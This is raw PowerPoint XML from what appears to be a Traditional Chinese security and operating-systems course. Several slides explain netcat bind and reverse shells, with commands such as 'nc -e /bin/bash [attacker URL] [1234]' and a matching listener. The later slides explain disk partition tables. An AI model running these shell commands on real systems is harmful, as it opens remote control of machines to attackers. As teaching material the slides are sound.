              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>):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於目標上建立監聽 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，使用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執行</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="pt-BR" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>[obj]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l –p 1234 –e /bin/bash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>攻擊者與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建立連線</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="pt-BR" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>[attack]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[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>目標 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>URL] 1234 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>[attack]# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>more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(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>完成連線後下達攻擊的指令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3</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="16" name="群組 15"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1186490" y="2361359"/>
            <a:ext cx="1728192" cy="1872208"/>
            <a:chOff x="971600" y="2492896"/>
            <a:chExt cx="1944216" cy="1944216"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="圓角矩形 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="971600" y="2492896"/>
              <a:ext cx="1944216" cy="1944216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sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="圓角矩形 7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1039416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1600" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>發送攻擊指令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1312766" y="2688788"/>
              <a:ext cx="12618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solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>攻擊</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>者</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-TW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6300192" y="2452564"/>
            <a:ext cx="2009527" cy="1814359"/>
            <a:chOff x="5349281" y="2597052"/>
            <a:chExt cx="2009527" cy="1814359"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="圓角矩形 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5349281" y="2597052"/>
              <a:ext cx="2009527" cy="1814359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868144" y="2688788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TW" altLang="en-US" dirty="0"/>
                <a:t>目標</a:t>
              </a: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449752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shell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3" name="直線單箭頭接點 12"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="8" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2854401" y="3455855"/>
            <a:ext cx="3564839" cy="457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3365350" y="2996952"/>
            <a:ext cx="2033505" cy="338554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600" b="1" dirty="0" smtClean="0"/>
              <a:t>連線某個</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0" smtClean="0"/>
              <a:t>TCP PORT</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW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22825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591176"/>
          </a:xfrm>
        </p:spPr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Reverse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有防火牆</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>):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攻擊者監聽</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>port 1234</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="pt-BR" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>[attack]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l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v –p 1234</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>下頁</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>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4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="16" name="群組 15"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="971600" y="2348880"/>
            <a:ext cx="1944216" cy="1944216"/>
            <a:chOff x="971600" y="2492896"/>
            <a:chExt cx="1944216" cy="1944216"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="圓角矩形 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="971600" y="2492896"/>
              <a:ext cx="1944216" cy="1944216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sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="圓角矩形 7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1039416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000" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>發送攻擊指令</a:t>
              </a:r>
              <a:endParaRPr lang="zh-TW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1312766" y="2688788"/>
              <a:ext cx="12618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solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>攻擊</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>者</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-TW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6156176" y="2420888"/>
            <a:ext cx="2009527" cy="1814359"/>
            <a:chOff x="5349281" y="2597052"/>
            <a:chExt cx="2009527" cy="1814359"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="圓角矩形 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5349281" y="2597052"/>
              <a:ext cx="2009527" cy="1814359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868144" y="2688788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TW" altLang="en-US" dirty="0"/>
                <a:t>目標</a:t>
              </a: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449752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shel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3" name="直線單箭頭接點 12"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="11" idx="1"/>
            <a:endCxn id="8" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2848000" y="3500874"/>
            <a:ext cx="3408647" cy="321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3365350" y="2996952"/>
            <a:ext cx="2033505" cy="338554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600" b="1" dirty="0" smtClean="0"/>
              <a:t>連線某個</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0" smtClean="0"/>
              <a:t>TCP PORT</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1600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2691000" y="5133600"/>
              <a:ext cx="1972800" cy="396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75160" y="5070240"/>
                <a:ext cx="200448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筆跡 11"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="1978920" y="5512680"/>
              <a:ext cx="3351240" cy="392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3080" y="5448960"/>
                <a:ext cx="3382920" cy="166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61632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安常用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>指令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549901"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>n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netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>命令工具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Reverse shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>建立</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>中間有防火牆</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>):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建立步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目標主機主動與攻擊者的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Port 1234</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>建立連線，並使用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去執行</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="pt-BR" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>[obj]# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> –e /bin/bash [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>攻擊者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>[1234]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>[attack]# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>more 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 (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>完成連線後攻擊者下達的指令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85</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="16" name="群組 15"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="971600" y="2348880"/>
            <a:ext cx="1944216" cy="1944216"/>
            <a:chOff x="971600" y="2492896"/>
            <a:chExt cx="1944216" cy="1944216"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="圓角矩形 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="971600" y="2492896"/>
              <a:ext cx="1944216" cy="1944216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sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="圓角矩形 7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1039416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000" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>發送攻擊指令</a:t>
              </a:r>
              <a:endParaRPr lang="zh-TW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1312766" y="2688788"/>
              <a:ext cx="12618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solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>攻擊</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>者</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-TW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6156176" y="2420888"/>
            <a:ext cx="2009527" cy="1814359"/>
            <a:chOff x="5349281" y="2597052"/>
            <a:chExt cx="2009527" cy="1814359"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="圓角矩形 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5349281" y="2597052"/>
              <a:ext cx="2009527" cy="1814359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868144" y="2688788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TW" altLang="en-US" dirty="0"/>
                <a:t>目標</a:t>
              </a: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449752" y="3384814"/>
              <a:ext cx="1808584" cy="584448"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFFF99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shel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3" name="直線單箭頭接點 12"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="11" idx="1"/>
            <a:endCxn id="8" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2848000" y="3500874"/>
            <a:ext cx="3408647" cy="321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3365350" y="2996952"/>
            <a:ext cx="2033505" cy="338554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600" b="1" dirty="0" smtClean="0"/>
              <a:t>連線某個</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0" smtClean="0"/>
              <a:t>TCP PORT</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1600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6420600" y="5146920"/>
              <a:ext cx="1117080" cy="198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404400" y="5083200"/>
                <a:ext cx="114912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筆跡 11"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2893320" y="5897880"/>
              <a:ext cx="4004280" cy="266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77480" y="5834520"/>
                <a:ext cx="4035960" cy="15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1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表</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(partition table)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="內容版面配置區 5" descr="2.jp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 b="1139"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="971600" y="1268760"/>
            <a:ext cx="7128792" cy="4738339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2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607400" y="1764360"/>
              <a:ext cx="264600" cy="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91560" y="1701000"/>
                <a:ext cx="2962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1393200" y="1928880"/>
              <a:ext cx="478800" cy="216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77000" y="1865160"/>
                <a:ext cx="51084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2407320" y="5943600"/>
              <a:ext cx="117216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91480" y="5879880"/>
                <a:ext cx="12038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1878840" y="1743120"/>
              <a:ext cx="800280" cy="24649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863000" y="1679400"/>
                <a:ext cx="832320" cy="259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4262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5800" y="2284413"/>
            <a:ext cx="77724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>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" kern="0" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="標楷體" pitchFamily="65" charset="-120"/>
              </a:rPr>
              <a:t>一、作業系統</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" kern="0" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="標楷體" pitchFamily="65" charset="-120"/>
              </a:rPr>
              <a:t>介紹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C2F6C3-9846-4330-8B31-536AC8552DD9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900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表</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(partition tabl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/>
              <a:t>由於分割表就只有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t>64 bytes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>而已，最多只能容納四筆分割的記錄， 這四個分割的記錄被稱為主要</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t>(Primary)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>或延伸</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t>(Extended)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>分割槽。 根據上面的圖示與說明，我們可以得到幾個重點資訊：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>其實所謂的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t>『</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>分割</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t>』</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>只是針對那個</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t>64 bytes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>的分割表進行設定而已！</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>硬碟預設的分割表僅能寫入四組分割資訊</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>這四組分割資訊我們稱為主要</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t>(Primary)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>或延伸</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t>(Extended)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>分割槽</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>分割槽的最小單位為磁柱</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t>(cylinder)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>當系統要寫入磁碟時，一定會參考磁碟分割表，才能針對某個分割槽進行資料的處理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3276720" y="1504800"/>
              <a:ext cx="1339920" cy="702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260880" y="1441440"/>
                <a:ext cx="137196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460840" y="1473120"/>
              <a:ext cx="254520" cy="320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45000" y="1409760"/>
                <a:ext cx="2862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6616800" y="1517760"/>
              <a:ext cx="177192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600960" y="1454040"/>
                <a:ext cx="18036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958680" y="5086440"/>
              <a:ext cx="641880" cy="64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42840" y="5022720"/>
                <a:ext cx="6735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222640" y="5105520"/>
              <a:ext cx="667080" cy="194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206800" y="5041800"/>
                <a:ext cx="6987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753000" y="5099040"/>
              <a:ext cx="126396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736800" y="5035680"/>
                <a:ext cx="12960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2209680" y="5486400"/>
              <a:ext cx="1099080" cy="766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193840" y="5423040"/>
                <a:ext cx="113076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724280" y="5575320"/>
              <a:ext cx="2159640" cy="129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708440" y="5511960"/>
                <a:ext cx="21913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235880" y="1885680"/>
              <a:ext cx="522000" cy="291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220040" y="1822320"/>
                <a:ext cx="55368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5586480" y="1814400"/>
              <a:ext cx="1750680" cy="932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570640" y="1751040"/>
                <a:ext cx="1782360" cy="21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7815240" y="1892880"/>
              <a:ext cx="371880" cy="219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799400" y="1829520"/>
                <a:ext cx="40356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793080" y="2121480"/>
              <a:ext cx="1471680" cy="2077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77240" y="2058120"/>
                <a:ext cx="1503720" cy="33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4278960" y="3800520"/>
              <a:ext cx="2572200" cy="1645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4263120" y="3736800"/>
                <a:ext cx="2603880" cy="29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6929280" y="3578760"/>
              <a:ext cx="557640" cy="2005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913440" y="3515400"/>
                <a:ext cx="589320" cy="32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7215120" y="3550320"/>
              <a:ext cx="178920" cy="48600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199280" y="3486960"/>
                <a:ext cx="210600" cy="61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7436520" y="3450240"/>
              <a:ext cx="157680" cy="72180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420680" y="3386880"/>
                <a:ext cx="189360" cy="84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7551000" y="3457440"/>
              <a:ext cx="321840" cy="41472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535160" y="3394080"/>
                <a:ext cx="353520" cy="54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3864600" y="5000400"/>
              <a:ext cx="1407960" cy="291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3848760" y="4937040"/>
                <a:ext cx="143964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2343240" y="5157720"/>
              <a:ext cx="879120" cy="2880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327400" y="5094360"/>
                <a:ext cx="910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3714840" y="5186160"/>
              <a:ext cx="1457640" cy="3636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3699000" y="5122800"/>
                <a:ext cx="14893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4886280" y="5593320"/>
              <a:ext cx="1672200" cy="4320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870440" y="5529960"/>
                <a:ext cx="170388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5464800" y="5329080"/>
              <a:ext cx="1272240" cy="22176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5448960" y="5265720"/>
                <a:ext cx="1303920" cy="34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5693400" y="5543280"/>
              <a:ext cx="964800" cy="36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677560" y="5479920"/>
                <a:ext cx="9964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8" name="筆跡 27"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="7504560" y="5760720"/>
              <a:ext cx="360" cy="36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7488720" y="5697360"/>
                <a:ext cx="320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9" name="筆跡 28"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="4317480" y="4304160"/>
              <a:ext cx="1698480" cy="2664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301280" y="4240800"/>
                <a:ext cx="173052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0" name="筆跡 29"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="6459480" y="4317120"/>
              <a:ext cx="2071080" cy="46080"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="30" name="筆跡 29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6443640" y="4253760"/>
                <a:ext cx="21027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筆跡 30"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="3994200" y="3790800"/>
              <a:ext cx="2229120" cy="57600"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="31" name="筆跡 30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3978360" y="3727440"/>
                <a:ext cx="2260800" cy="18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8314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磁碟分割表</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(partition tabl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/>
              <a:t>主要分割、延伸分割與邏輯分割的特性定義：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>主要分割與延伸分割最多可以有四筆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硬碟的限制</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>延伸分割最多只能有一個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作業系統的限制</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>邏輯分割是由延伸分割持續切割出來的分割槽；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>能夠被格式化後，作為資料存取的分割槽為主要分割與邏輯分割。延伸分割無法格式化；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>邏輯分割的數量依作業系統而不同，在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>系統中，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t>IDE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>硬碟最多有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t>59</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>個邏輯分割</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t>(5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>號到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t>63</a:t>
            </a:r>
            <a:r>
